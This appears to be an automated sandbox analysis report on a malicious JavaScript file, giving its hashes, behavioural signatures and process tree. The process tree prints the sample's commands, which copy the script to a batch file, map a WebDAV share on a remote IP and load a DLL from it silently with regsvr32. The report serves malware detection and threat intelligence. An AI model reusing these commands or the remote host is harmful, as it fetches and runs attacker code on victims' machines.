Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240708-en -
resource tags
-
submitted
09/07/2024, 05:49
General
-
Target
4829214488753774.js
-
Size
5KB
-
MD5
cf57219ecfcebb46172f3a6abed89655
-
SHA1
b6fbd4d12d8c403bd3465f544765a74800238b42
-
SHA256
567d57077ddc7b84f40992a6d5381d758f1d3a97dc86f3881bc0f2f728bf648c
-
SHA512
ec17cfcbbd7c6b98ebbda846649961126c6cb473439aa64e0f4213f09847751426d61fddc50336f47419a79d9000ac4d4763955940f3d75babf3e0a06687dbf8
-
SSDEEP
96:vX4PWcyJvjsAAjwxXMeW5gXupeJJ5RDmw5inAlhBk1lhc:/cyJAMwpeznKw5inAlhBk1lhc
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 6 IoCs
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\4829214488753774.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\4829214488753774.js" "C:\Users\Admin\\khoqgw.bat" && "C:\Users\Admin\\khoqgw.bat"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet use \\45.9.74.13@8888\DavWWWRoot\3⤵
-
-
C:\Windows\system32\regsvr32.exeregsvr32 /s \\45.9.74.13@8888\DavWWWRoot\688.dll3⤵
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5KB
MD5cf57219ecfcebb46172f3a6abed89655
SHA1b6fbd4d12d8c403bd3465f544765a74800238b42
SHA256567d57077ddc7b84f40992a6d5381d758f1d3a97dc86f3881bc0f2f728bf648c
SHA512ec17cfcbbd7c6b98ebbda846649961126c6cb473439aa64e0f4213f09847751426d61fddc50336f47419a79d9000ac4d4763955940f3d75babf3e0a06687dbf8